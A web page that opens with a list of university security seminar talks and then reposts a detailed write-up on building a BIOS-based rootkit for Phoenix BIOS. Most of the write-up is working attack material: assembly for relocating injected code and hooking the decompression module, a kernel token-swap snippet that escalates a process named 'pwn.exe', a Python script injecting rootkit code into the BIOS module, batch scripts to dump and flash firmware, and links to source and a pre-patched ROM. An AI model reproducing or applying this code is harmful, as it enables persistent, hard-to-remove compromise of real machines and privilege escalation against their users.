(446.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/02/2011

Campus closed/snow

02/09/2011

Understanding insiders: An analysis of risk-taking behavior *

Understanding insiders: An analysis of risk-taking behavior *

Fariborz Farahmand – Purdue University
(442.2MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/16/2011

Malware Trends and Techniques

Tom Ervin – MITRE

02/23/2011

A couple of results about JavaScript

A couple of results about JavaScript

Jan Vitek – Purdue University
(443.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/02/2011

“Modeling DNS Security: Misconfiguration, Availability, and Visualization”

Casey Deccio – Sandia National Labs
(443.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/09/2011

Exploiting Banners for Fun and Profits

Exploiting Banners for Fun and Profits

Michael Schearer – Booz Allen Hamilton
(446.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/06/2011

Society, Law Enforcement and the Internet:  Models for Give and Take

Society, Law Enforcement and the Internet: Models for Give and Take

Carter Bullard – QoSient, LLC
(451.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/13/2011

FuzzyFusion™, an application architecture for multisource information fusion

FuzzyFusion™, an application architecture for multisource information fusion

Ronda R. Henning – Harris Corporation
(446.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/27/2011

Mobile Phones and Evidence Preservation

Mobile Phones and Evidence Preservation

Eric Katz – Purdue University
(447.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

08/24/2011

Provisioning Protocol Challenges in an Era of gTLD Expansion

Provisioning Protocol Challenges in an Era of gTLD Expansion

Scott Hollenbeck – Verisign
(443.6MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

08/31/2011

Non-homogeneous anonymizations

Non-homogeneous anonymizations

Tamir Tassa – The Open University, Israel
(447.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/07/2011

Detecting Bots in Online Games using Human Observational Proofs

Detecting Bots in Online Games using Human Observational Proofs

Steven Gianvecchio – MITRE
(445.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/21/2011

 Methods and Techniques for Protecting Data in Real Time on the Wire

Methods and Techniques for Protecting Data in Real Time on the Wire

Joe Leonard – Global Velocity
(444.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/28/2011

Weighted Multiple Secret Sharing

Weighted Multiple Secret Sharing

Xukai Zou – Indiana University-Purdue University Indianapolis
(449.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/05/2011

Trusted Computing and Security for Embedded Systems

Trusted Computing and Security for Embedded Systems

Hal Aldridge – Sypris Electronics
(445.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/12/2011

Enterprise-Wide Intrusions Involving Advanced Threats

Enterprise-Wide Intrusions Involving Advanced Threats

Dan McWhorter and Steve Surdu – Mandiant Corporation
(443.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/19/2011

Ontological Semantic Technology Goes Phishing

Ontological Semantic Technology Goes Phishing

Julia M. Taylor, Victor Raskin, and Eugene H. Spafford – Purdue University
(446.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/16/2011

Jam me if you can: Mitigating the Impact of Inside Jammers

Jam me if you can: Mitigating the Impact of Inside Jammers

Loukas Lazos – University of Arizona
(443.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/30/2011

Soundcomber: A Stealthy and Context-Aware Sound Trojan for Smartphones

Soundcomber: A Stealthy and Context-Aware Sound Trojan for Smartphones

Apu Kapadia – Indiana University
(447.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

12/07/2011

No Seminar


01/13/2010

“Thinking Outside the Box”

Eugene Spafford – Purdue University
(443.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/20/2010

Applications of biometric technologies

Applications of biometric technologies

Stephen Elliott – Purdue University
(416.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

01/27/2010

Fast-flux Attacks

Shijie Zhou – University of Electronic Science and Technology of China

02/03/2010

Detecting Insider Theft of Trade Secrets

Detecting Insider Theft of Trade Secrets

Greg Stephens – Mitre
(429.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/10/2010

Dissecting Digital Data: Context & Meaning through Analytics

Dissecting Digital Data: Context & Meaning through Analytics

Marcus Rogers – Purdue University
(465.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

02/17/2010

Provenance-based Data Trustworthiness Assessment in Data Streams

Provenance-based Data Trustworthiness Assessment in Data Streams

Hyo-Sang Lim – Purdue University
(379.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

03/10/2010

Making of the CWE Top-25, 2010 Edition

Making of the CWE Top-25, 2010 Edition

Pascal Meunier – Purdue University
(444.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/07/2010

60 years of scientific research in cryptography:  a reflection

60 years of scientific research in cryptography: a reflection

Yvo Desmedt – University College London, UK
(449.3MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/14/2010

Security of JavaScript in a Browser Environment

Security of JavaScript in a Browser Environment

Christian Hammer – Purdue University
(448.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/21/2010

The role of System Security Engineering in the engineering lifecycle

The role of System Security Engineering in the engineering lifecycle

Stephen Dill – Lockheed Martin
(446.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

04/28/2010

“Ontological Semantic Technology for Detecting Insider Threat and Social Engineering”

Victor Raskin & Julia Taylor – Purdue University
(451.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

08/25/2010

Secure Network Coding for Wireless Mesh Networks

Secure Network Coding for Wireless Mesh Networks

Cristina Nita-Rotaru – Purdue University
(443.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/01/2010

Data in the Cloud: Authentication Without Leaking

Data in the Cloud: Authentication Without Leaking

Ashish Kundu – Purdue University
(441.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/08/2010

Rootkits

Rootkits

Xeno Kovah – MITRE
(445.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/22/2010

Security of Mobile Ad Hoc Networks (MANETs)

Security of Mobile Ad Hoc Networks (MANETs)

Petros Mouchtaris – Telcordia
(448.2MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

09/29/2010

Assured Processing through Obfuscation

Assured Processing through Obfuscation

Sergey Panasyuk – Air Force Research Laboratory
(445.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/06/2010

Global Study of Web 2.0 Use in Organizations

Global Study of Web 2.0 Use in Organizations

Mihaela Vorvoreanu, Lorraine G. Kisselburgh – Purdue University
(444.4MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/20/2010

Trust and Protection in the Illinois Browser Operating System

Trust and Protection in the Illinois Browser Operating System

Sam King – University of Illinois
(451.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/27/2010

The role of automata theory in software verification

The role of automata theory in software verification

P. Madhusudan – University of Illinois at Urbana-Champaign
(451.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/03/2010

Tackling System-Wide Integrity

Tackling System-Wide Integrity

Trent Jaeger – Pennsylvania State
(444.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/10/2010

Detecting Coordinated Attacks with Traffic Analysis

Detecting Coordinated Attacks with Traffic Analysis

Nikita Borisov – University of Illinois at Urbana-Champaign
(439.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/17/2010

Security Applications for Physically Unclonable Functions

Security Applications for Physically Unclonable Functions

Michael Kirkpatrick – Purdue University
(447.9MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

12/01/2010

Nudging the Digital Pirate: Behavioral Issues in the Piracy Context

Nudging the Digital Pirate: Behavioral Issues in the Piracy Context

Matthew Hashim – Purdue University
(443.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

BIOS Based Rootkits


BIOS Based Rootkits


This reasearch is published for purely educational purposes and it is a work of Exfiltrated.com [ and not CyberPunk in any way ]. Many TnX and all the credit goes to them. Please take your time and visit their page and support the researchers. Make sure you check it out

Approach

Currently there is a very limited amount of sample code available for the creation of BIOS rootkits, with the only publicly available code being released along with the initial BIOS rootkit demonstration in March of 2009 (as far as I’m aware). My first goal was to reproduce the findings made by Core Security in 2009, and then my second task was to investigate how I could extend their findings. My ultimate goal was to create some sort of BIOS based rootkit which could easily be deployed.

In 2009 there was research done into a similar area of security, which is boot sector based rootkits. Unlike BIOS based rootkits, developments in this area have progressed rapidly, which has led to a number of different master boot record (MBR) based rootkits being developed and released. This type of rootkit was termed a “Bootkit”, and similar to a BIOS based rootkit it aims to load itself before the OS is loaded. This similarity led a number of bootkit developers to remark that it should be possible to perform this type of attack directly from the BIOS instead of loading from the MBR. Despite the comments and suggestions that this bootkit code could be moved into the BIOS for execution, there has not yet been any examples of such code made public.

The first stage for completing this project was to set up a test and development environment where BIOS modifications could be made and debugged. In their paper on Persistent BIOS Infection, Sacco and Ortega detail how they discovered that VMware contains a BIOS rom as well as a GDB server which can be used for debugging applications starting from the BIOS itself. After getting everything going successfully in VMware, work was done to port the VMware BIOS modifications to other similar BIOS’s, and will be described in the second half of this write-up.


VMware BIOS Configuration

Ok, enough background, onto the actually doing it!

The first step which is required is to extract the BIOS from VMware itself. In Windows, this can be done by opening the vmware-vmx.exe executable with any resource extractor, such as Resource Hacker. There are a number of different binary resources bundled into this application, and the BIOS is stored in resource ID 6006 (at least in VMware 7). In other versions this may be different, but the key thing to look for is the resource file that is 512kb in size. The following image shows what this looks like in Resource Hacker:

first

While this BIOS image is bundled into the vmware-vmx.exe application, it is also possible to use it separately, without the need to modify into the vmware executable after each change. VMware allows for a number of “hidden” options to be specified in an image’s VMX settings file. At some point I plan to document a bunch of them on the Tools page of this website, because some really are quite useful! The ones which are useful for BIOS modifications and debugging are the following:

bios440.filename = "BIOS.ROM"
debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoint = "TRUE"
monitor.debugOnStartGuest32 = "TRUE"

The first setting allows for the BIOS rom to be loaded from a file instead of the vmware-vmx application directly. The following two lines enable the built in GDB server. This server listens for connections on port 8832 whenever the image is running. The last line instructs VMware to halt code execution at the first line of the guest image’s BIOS. This is very useful as it allows breakpoints to be defined and memory to be examined before any BIOS execution takes place. Testing was done using IDA Pro as the GDB client, and an example of the VMware guest image halted at the first BIOS instruction can be seen in the screenshot below:

2

When initially using this test environment, there were significant issues with IDA’s connection to the GDB server. After much trial and error and testing with different GDB clients, it was determined that the version of VMware was to blame. Version 6 and 6.5 do not appear to work very well with IDA, so version VMware version 7 was used for the majority of the testing. The BIOS is comprised of 16 bit code, and not the 32 bit code that IDA defaults to, so defining “Manual Memory Regions” in the debugging options of IDA was necessary. This allowed memory addresses to be defined as 16 bit code so that they would decompile properly.

Recreating Past Results – VMware BIOS Modification

As noted already, Sacco & Ortega have done two presentations on BIOS modification, and Wojtczuk & Tereshkin have also done a presentation regarding BIOS modification. Of these three presentations, only Sacco & Ortega included any source or sample code which demonstrated their described techniques. Since this was the only existing example available, it was used as the starting point for this BIOS based rootkits project.

The paper by Sacco & Ortega is fairly comprehensive in describing their set up and testing techniques. The VMware setup was completed as described above, and the next step was to implement the BIOS modification code which they had provided. The code provided required the BIOS rom to be extracted into individual modules. The BIOS rom included with VMware is a Phoenix BIOS. Research showed that there were two main tools for working with this type of BIOS, an open source tool called “phxdeco”, and a commercial tool called “Phoenix BIOS Editor”, which is provided directly by Phoenix. The paper by Sacco & Ortega recommended the use of the Phoenix BIOS Editor application and they had designed their code to make use of it. A trial version was downloaded from the internet and it appears to have all of the functionality necessary for this project. Looking for a download link again I can’t find anything that seems even half legitimate, but Google does come up with all kinds of links. I’ll just assume that it should be fairly easy to track down some sort of legitimate trial version still. Once the tools are installed, the next step is to build a custom BIOS.

I first tested that a minor modification to the BIOS image would take effect in VMware, which it did (changed the VMware logo colour). Next, I ran the Python build script provided by Sacco & Ortega for the BIOS modification. Aside from one typo in the Python BIOS assembly script everything worked great and a new BIOS was saved to disk. Loading this BIOS in VMware however did not result in the same level of success, with VMware displaying a message that something had gone horribly wrong in the virtual machine and it was being shut down. Debugging of this issue was done in IDA and GDB, but the problem was difficult to trace (plus there were version issues with IDA). In an effort to get things working quickly, a different version of VMware was loaded, so that the test environment would match that of Sacco & Ortega’s. After some searching, the exact version of VMware that they had used was located and installed. This unfortunately still did not solve the issue, the same crash error was reported by VMware. While I had seen this BIOS modification work when demonstrated as part of their presentation, it was now clear that their example code would require additional modification before it could work on any test system.

Many different things were learned as a result of debugging Sacco’s & Ortega’s code, and eventually the problem was narrowed down to an assembler instruction which was executing a far call to an absolute address which was not the correct address for the BIOS being used. With the correct address entered the BIOS code successfully executed, and the rootkit began searching the hard drive for files to modify. This code took a very long time to scan across the hard drive (which was only 15gb), and it was run multiple times before the system would start. The proof of concept code included the functionality to patch notepad.exe so that it would display a message when started, or to modify the /etc/passwd file on a unix system so that the root password would be set to a fixed value. This showed that the rootkits can be functional on both Windows and Linux systems, even if only used for simple purposes.

Bootkit Testing

While significantly later on in the project time line, the functionality of various bootkit code was also tested, and the results recreated to determine which would work best as not just a bootkit, but also a BIOS based rootkit. Four different bootkits were examined, the Stoned, Whistler, Vbootkit and Vbootkit2 bootkits. The Stoned and Whistler bootkits were designed to function much more like malware than a rootkit, and did not have a simple source code structure. The Vbootkit2 bootkit was much different, as it was not designed to be malware and had (relatively) well documented source code. This bootkit was designed to be run from a CD, but only was tested with Windows 7 beta. When used with Windows 7 retail, the bootkit simply did not load as different file signatures were used by Windows. Some time was spent determining the new file signatures so that this bootkit could be tested, but it would still not load successfully. To allow for testing a beta copy of Windows 7 was obtained instead. When the Vbootkit2 software was run on a Windows 7 beta system, everything worked as expected. The Vbootkit2 software included the ability to escalate a process to System (above admin) level privileges, to capture keystrokes, and to reset user passwords. These were all items that would be valuable to have included in a rootkit, but significant work remained to port this application to Windows 7 retail. The Vbootkit software was examined next; it was designed to work with Windows 2003, XP and 2000. While it was not packaged so that it could be run from CD, only minor modifications were required to add that functionality. This software only included the ability to escalate process privileges, but that alone is a very valuable function. This bootkit software was chosen for use with the BIOS rootkit, which is described in the next section. NVLabs (http://www.nvlabs.in/) are the authors of the bootkit itself, which in many ways represents the main functionality of this project, so a big thanks to them for making their code public! It appears their source code is no longer available on their website, but it can still be downloaded from Archive.org here.

BIOS Code Injection

The proof of concept code by Sacco & Ortega which was previously tested was very fragile, and its functions were not the type of actions that a rootkit should be performing. The first step in developing a new rootkit was to develop a robust method of having the BIOS execute additional code.

Sacco & Ortega patched the BIOS’s decompression module since it was already decompressed (so that it could decompress everything else), and it is called as the BIOS is loaded. This reasoning was appropriate, but the hooking techniques needed to be modified. During normal operation, the BIOS would call the decompression module once for each compressed BIOS module that was present. The VMware BIOS included 22 compressed modules, so the decompression code was called 22 times. This module will overwrite our additional code as it resides in buffer space, so it is necessary to have our addition code relocate itself.

The process that I used includes the following steps:

  • Insert a new call at the beginning of the decompression module to our additional code.
  • Copy all of our additional code to a new section of memory.
  • Update the decompression module call to point to the new location in memory where our code is.
  • Return to the decompression module and continue execution.

This process allows for a significant amount of additional code to be included in the BIOS ROM, and for that code to run from a reliable location in memory once it has been moved there. The above four steps can be shown in a diagram as follows:
(mspaint is awesome)

Implementing this code in assembler was possible a number of different ways, but the goal was to create code that would be as system independent as possible. To accomplish this, all absolute addressing was removed, and only near calls or jumps were used. The exceptions to this were any references to our location in the free memory, as that was expected to be a fixed location, regardless of the system. The following is the assembler code which was used to handle the code relocation:

start_mover:
; The following two push instructions will save the current state of the registers onto the
stack.
pusha
pushf

; Segment registers are cleared as we will be moving all code to segment 0
xor ax, ax              ; (This may or may not be obvious, but xor'ing the register sets it to 0).
xor di, di
xor si, si
push cs; Push the code segment into the data segment, so we can overwrite the calling address code
pop ds; (CS is moved to DS here)
mov es, ax              ; Destination segment (0x0000)
mov di, 0x8000              ; Destination offset, all code runs from 0x8000
mov cx, 0x4fff              ; The size of the code to copy, approximated as copying extra doesn't hurt anything

; The following call serves no program flow purposes, but will cause the calling address (ie, where this code
; is executing from) onto the stack. This allows the code to generically patch itself no matter where it might
; be in memory. If this technique was not used, knowledge of where in memory the decompression module would be
; loaded would be required in advance (so it could be hard coded), which is not a good solution as it differs for every system.
call b

b:
pop si                  ; This will pop our current address of the stack (basically like copying the EIP register)
add si, 0x30                ; How far ahead we need to copy our code
rep movsw               ; This will repeat calling the movsw command until cx is decremented to 0. When this command is 
                    ; finished, our code will be copied to 0x8000
mov ax, word [esp+0x12]         ; This will get the caller address to patch the original hook
sub ax, 3               ; Backtrack to the start of the calling address, not where it left off
mov byte [eax], 0x9a            ; The calling function needs to be changed to an Call Far instead of a Call Near
add ax, 1               ; Move ahead to set a new address to be called in future
mov word [eax], 0x8000          ; The new address for this code to be called at
mov word [eax+2], 0x0000        ; The new segment (0)

; The code has now been relocated and the calling function patched, so everything can be restored and we can return.
popf
popa

; The following instructions were overwritten with the patch to the DECOMPC0.ROM module, so we need to run them now before we return.
mov bx,es
mov fs,bx
mov ds,ax
ret                 ; Updated to a near return

Once the above code is executed, it will copy itself to memory offset 0x8000, and patch the instruction which initially called it, so that it will now point to 0x8000 instead. For initially testing this code, the relocated code was simply a routine which would display a “W” to the screen (see screenshot below). The end goal however was that our rootkit code could be called instead, so the next modification was to integrate that code.

4

As noted in the earlier section, the “VBootkit” software was determined to be the best fit for the type of rootkit functionality that could be loaded from the BIOS. The VBootkit software was originally created so that it would run from a bootable CD. While this starting point is similar to running from the BIOS, there are a number of key differences. These differences are mainly based on the booting process, which is shown below:

Our BIOS based rootkit code will run somewhere in between the BIOS Entry and the BIOS Loading Complete stages. A bootkit would instead run at the last stage, starting from 0x7C00 in memory.

The VBootkit software was designed so that it would be loaded into address 0x7C00, at which point it would relocate itself to address 0x9E000. It would then hook interrupt 0x13, and would then read the first sector from the hard drive (the MBR) into 0x7C00, so that it could execute as if the bootkit was never there. This process needed to be modified so that all hard coded addresses were replaced (as the bootkit is no longer executing from 0x7C00). Additionally, there is no need to load the MBR into memory as the BIOS will do that on its own.

The VBootkit software hooks interrupt 0x13, that is, it replaces the address that the interrupt would normally go to with its own address, and then calls the interrupt after doing additional processing. This turned out to require an additional modification as when our BIOS rootkit code is called interrupt 0x13 is still not fully initialized. This was overcome by storing a count in memory of how many times the decompression module had been run. If it had been run more 22 times (for 22 modules), then the BIOS was fully initialized, and we could safely hook interrupt 0x13.

The Vbootkit software follows the following process:

  • When first called it will relocate itself to 0x9E000 in memory (similar to our BIOS relocation done previously)
  • Next it will hook interrupt 0x13, which is the hard disk access interrupt
  • All hard disk activity will be examined to determine what data is being read
  • If the Windows bootloader is read from the hard disk, the bootloader code will be modified before it is stored in memory
  • The modification made to the bootloader will cause it to modify the Windows kernel. This in turn will allow arbitrary code to be injected into the Windows kernel, allowing for the privilege escalation functionality.

With our BIOS injection plus the bootkit loaded the process flow happens as follows:

The result of all of these modifications is a BIOS which copies the bootkit into memory and executes it, loads the OS from the hard drive, and then ends with an OS which has been modified so that certain processes will run with additional privileges. The following screenshot shows the bootkit code displaying a message once it finds the bootloader and the kernel and successfully patches them:

5

The code used for this rootkit was set to check for any process named “pwn.exe”, and if found, give it additional privileges. This is done every 30 seconds, so the differences in privileges are easy to see. This function can be seen in the code and screenshot below:

xor ecx,ecx
mov word cx, [CODEBASEKERNEL + Imagenameoffset]
cmp dword [eax+ecx], "PWN."         ; Check if the process is named PWN.exe
je patchit
jne donotpatchtoken             ; jmp takes 5 bytes but this takes 2 bytes

patchit:
mov word cx, [CODEBASEKERNEL + SecurityTokenoffset]
mov dword [eax + ecx],ebx       ; replace it with services.exe token, offset for sec token is 200

6

The BIOS rootkit which has been developed could definitely include more functionality (such as what is included in Vbootkit2), but still acts as an effective rootkit in its current state.

BIOS Decompression and Patching

Now that we know how we want the rootkit to be injected into the BIOS, the next step is to actually patch the BIOS with our rootkit code. To do this we need to extract all of the BIOS modules, patch the decompression module, and reassemble everything. The modules can be extracted using the phxdeco command line tool, or the Phoenix BIOS Editor. Once the decompression module is extracted, the following code will patch it with our rootkit:

#!/usr/bin/python
import os,struct,sys
###############################################
# BIOS Decompression module patching script - By Wesley Wineberg
#
# The Phoenix BIOS Editor application (for Windows) will generate a number of module files
# including the decompression module which will be named "DECOMPC0.ROM". These files are
# saved to C:\Program Files\Phoenix Bios Editor\TEMP (or similar) once a BIOS WPH file is
# opened. The decompression module file can be modified with this script. Once modified,
# any change can be made to the BIOS modules in the BIOS editor so that a new BIOS WPH file
# can be generated by the BIOS editor. The decompression module can alternatively be
# extracted by phnxdeco.exe, but this does not allow for reassembly. This script requires
# that NASM be present on the system it is run on.
#
# INPUT:
# This patching script requires the name and path to the BIOS rootkit asm file to be passed
# as an argument on the command line.
#
# OUTPUT:
# This script will modify the DECOMPC0.ROM file located in the same directory as the script
# so that it will run the BIOS rootkit asm code.
# Display usage info
if len(sys.argv) < 2:
print "Modify and rebuild Phoenix BIOS DECOMP0.ROM module. Rootkit ASM code filename
required!"
exit(0)
# Find rootkit code name
shellcode = sys.argv[1].lower()
# Assemble the assembler code to be injected. NASM is required to be present on the system
# or this will fail!
os.system('nasm %s' % shellcode)
# Open and display the size of the compiled rootkit code
shellcodeout = shellcode[0:len(shellcode)-4]
decomphook = open(shellcodeout,'rb').read()
print "Rootkit code loaded: %d bytes" % len(decomphook)
# The next line contains raw assembly instructions which will be placed 0x23 into the
decompression rom
# file. The decompression rom contains a header, followed by a number of push instructions
and then
# a CLD instruction. This code will be inserted immediately after, and will overwrite a
number of
# mov instructions. These need to be called by the rootkit code before it returns so that
#the normal decompression functions can continue.
# The assembler instruction contained below is a Near Call which will jump to the end of the
# decompression rom where the rootkit code has been inserted. This is followed by three NOP
# instructions as filler.
minihook = '\xe8\x28\x04\x90\x90\x90'
# The following would work but is an absolute call, not ideal!
# minihook = '\x9a\x5A\x04\xDC\x64\x90' # call far +0x45A
# Load the decompression rom file
decorom = open('DECOMPC0.ROM','rb').read()
# Hook location is 0x23 in to the file, just past the CLD instruction

hookoffset=0x23
# Insert hook contents into the decompression rom, overwriting what was there previously
decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]
# Pad the decompression rom with 100 NOP instructions. This is not needed, but does make it
# easier to identify where the modification has taken place.
decorom+="\x90"*100+decomphook
# Pad an additional 10 NOP's at the end.
decorom=decorom+'\x90'*10
# Recalculate the ROM size, so that the header can be updated
decorom=decorom[:0xf]+struct.pack("<H",len(decorom)-0x1A)+decorom[0x11:]
# Save the patched decompression rom over the previous copy
out=open('DECOMPC0.ROM','wb')
out.write(decorom)
out.close()
# Output results
print "The DECOMPC0.ROM file has now been patched."

An example of how to call the above script would be:

python patchdecomp.py biosrootkit.asm

If everything works successfully, you should see something similar to the following:

Rootkit code loaded: 1845 bytes
The DECOMPC0.ROM file has now been patched.

BIOS Reassembly

For raw BIOS files, such as the one included with VMware, a number of command line utilities included with the Phoenix Bios Editor (or available from Intel) can be used to reassemble everything. Later on when testing with a real PC it was necessary to save the BIOS in more than just the raw format, so the tool for reassembly used was the GUI version of the Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

This now means that the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly. The following shows the Phoenix BIOS Editor with a BIOS image open:

7

The Phoenix BIOS Editor is not specifically designed for swapping modules in and out, but does effectively allow for it. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

The BIOS based rootkit source code and patching scripts can be downloaded from the links near the end of this write-up if you would like to try all of this out yourself.

Real PC’s

The Phoenix BIOS was used with all of the VMware based development, so this was also chosen for testing with a physical PC. All of the physical (as opposed to virtual) BIOS testing was done using an HP Pavilion ze4400 laptop. BIOS testing was originally planned for use with PC’s and not laptops, as getting access to the PC motherboard for reflashing if necessary would be much easier. Despite this fact, quickly locating a PC with a Phoenix BIOS proved to be difficult, so a laptop was used instead (special thanks to David for reflashing my laptop when I accidently wrote source code to my BIOS!)

PC BIOS Retrieval

The first step to modifying a real system BIOS is to extract a copy of it. Phoenix has two different tools which they generally provide for this purpose, one is called “Phlash16″, and the other is called “WinPhlash”. Phlash16 is a command line utility (with a console based GUI), but will only run from DOS. WinPhlash, as its name suggests, runs from Windows. While this is a GUI based utility, it will also accept command line options, allowing us to automate the process of BIOS retrieval. For this project I ended up making some scripts to automate BIOS extraction and patching, but they’re quite basic and limited.

The following batch script will copy the BIOS into a file named BIOSORIG.WPH, and then check if it has previously been modified. The CheckFlash.py Perl script simply checks the BIOS contents for my name, which would not be in any unpatched BIOS.

@rem This file dumps the bios and checks if it has previously been patched.
@rem Dump
WinPhlash\WinPhlash.exe /ro=BIOSORIG.WPH
@rem Check if the BIOS has been patched already
Python\PortablePython_1.1_py2.6.1\App\python CheckFlash.py WinPhlash\BIOSORIG.WPH

PC BIOS Decompression and Patching

With the BIOS retrieved, the next step is to patch it with our rootkit code. This can be done using the exact same scripts that we used for VMware in the sections above. It was a goal of this project to design the patch as well as the patching process to be as compatible as possible. I am quite pleased that this turned out to be completely possible, so that the same tools can be used for completely different hardware running the same type of BIOS.

PC BIOS Reassembly

While there is a free tool which can extract modules from Phoenix BIOS’s, it appears that only the Phoenix Bios Editor will reassemble them as needed for typical PC’s. The WinPhlash tool requires additional information to be included with the BIOS, which it stores along with the raw BIOS in the WPH file. After testing many different options, it appears that the only way to successfully reassemble the WPH file is to use the GUI Phoenix Bios Editor. This unfortunately means that it is not possible to simply have one application that can be run on a system which will infect the BIOS, at least not using off the shelf tools.

Theoretically it should be possible to reverse engineer the WPH format and create a custom BIOS reassembly tool, but this was out of the scope of this project. Instead, the BIOS infection is a three stage process, requiring some manual intervention mainly for the reassembly.

As with patching the VMware BIOS, the same trick to have the Phoenix BIOS Editor reassemble a patched module can be used. When a BIOS image is first opened, all of the BIOS modules will be extracted to disk in a folder located at C:\Program Files\Phoenix BIOS Editor\TEMP. The decompression module can be copied from this folder, patched, and replaced. The Phoenix BIOS Editor will not allow you to save a BIOS without a modification, so it is necessary to modify a string value and then change it back (or just leave it) so that the BIOS can be saved.

BIOS Flashing

Once the BIOS is reassembled into the WPH file, the following batch script will flash the new BIOS image into the BIOS EEPROM and then reboot the PC so that it takes effect:

@rem This file uploads a file named "BIOSPATCHED.WPH" to the BIOS. Will reboot system when done.
WinPhlash\WinPhlash.exe /bu=BIOSBACKUP.WPH /I BIOSPATCHED.WPH

Laptop Modification Results

With everything described so far put together, the following shows the BIOS code being flashed onto a laptop (being run from the infect.bat script detailed above):

8

Once the flash completed, the BIOS rootkit successfully ran and loaded itself into the Windows kernel. The following screenshot shows a command prompt which starts initially as a normal user, and then after 30 seconds has its privileges escalated:

9

This demonstrated that the BIOS rootkit was portable enough to work on multiple systems (VMware, the HP laptop), and that the infection mechanisms were functional and working properly.

The “rootkit” developed for this project only implements one simple task, but as noted regarding the Vbootkit2 software, there is no reason additional functionality cannot be added to this. BIOS’s made by Phoenix were examined for this project, and it is likely that there are many similarities between Phoenix BIOS’s and BIOS’s from other manufacturers. While it is likely that code will need to be created for each separate manufacturer, there are not a large number of different BIOS vendors, so expanding this rootkit functionality to all of the common manufacturers should be feasible.

In the introduction I noted that new BIOS features, such as signed BIOS updates, make much of what is described here far less of an issue from a security standpoint. That is definitely good to see, but it is also worth remembering that there are more “legacy” computers out there than there are “new” ones, so this type of attack will still remain an issue for quite a while to come.

Demo VMware BIOS and source code

The following source code, and patched BIOS is provided as a proof of concept. It is in no way my intention that people take this and use it for any malicious purposes, but rather to demonstrate that such attacks are completely feasible on older BIOS configurations. I do not expect that it is very feasible to take this in its current form and turn it into any sort of useful malware, and based on that I am posting this code online.

As noted in the earlier sections, this code should work to patch most “Phoenix” BIOS’s. The patching scripts can be downloaded here:
BIOS_Based_Rootkit_Patch_Scripts.zip

The source code for the BIOS rootkit can be downloaded here:
biosrootkit.asm

You will need NASM to compile the code to patch into the BIOS if you are using the above scripts / source code. NASM should either be added to your path variable, or you should update the patching script to have an absolute path to it for it to work successfully. You will also need a copy of the Phoenix BIOS Editor, or a free tool equivalent to combine the decompression module back into a complete BIOS.

If you don’t want to compile this all yourself and would simply like to try it, a pre-patched BIOS for use with VMware can be downloaded here:
BIOS_rootkit_demo.ROM

PoC Usage and Notes

If you don’t feel like reading through the whole write-up above, here is the summary of how to try this out, and what it does.

  • First, download the BIOS_rootkit_demo.ROM BIOS image from the above link.
  • To try it, you need a copy of VMware installed, and a guest Windows XP operating system to test with. I’ve personally tested this with a bunch of different versions of VMware Workstation, as well as the latest version of VMware Player (which is free). I am also told that VMware Fusion works just fine too.
  • Before opening your guest WinXP VM, browse to where you have the VM stored on your computer, and open the .vmx file (ie WindowsXP.vmx or whatever your VM is called) in notepad. Add a new line at the end that matches the following: bios440.filename = "BIOS_rootkit_demo.ROM". Make sure you copy BIOS_rootkit_demo.ROM to that folder while you’re at it.
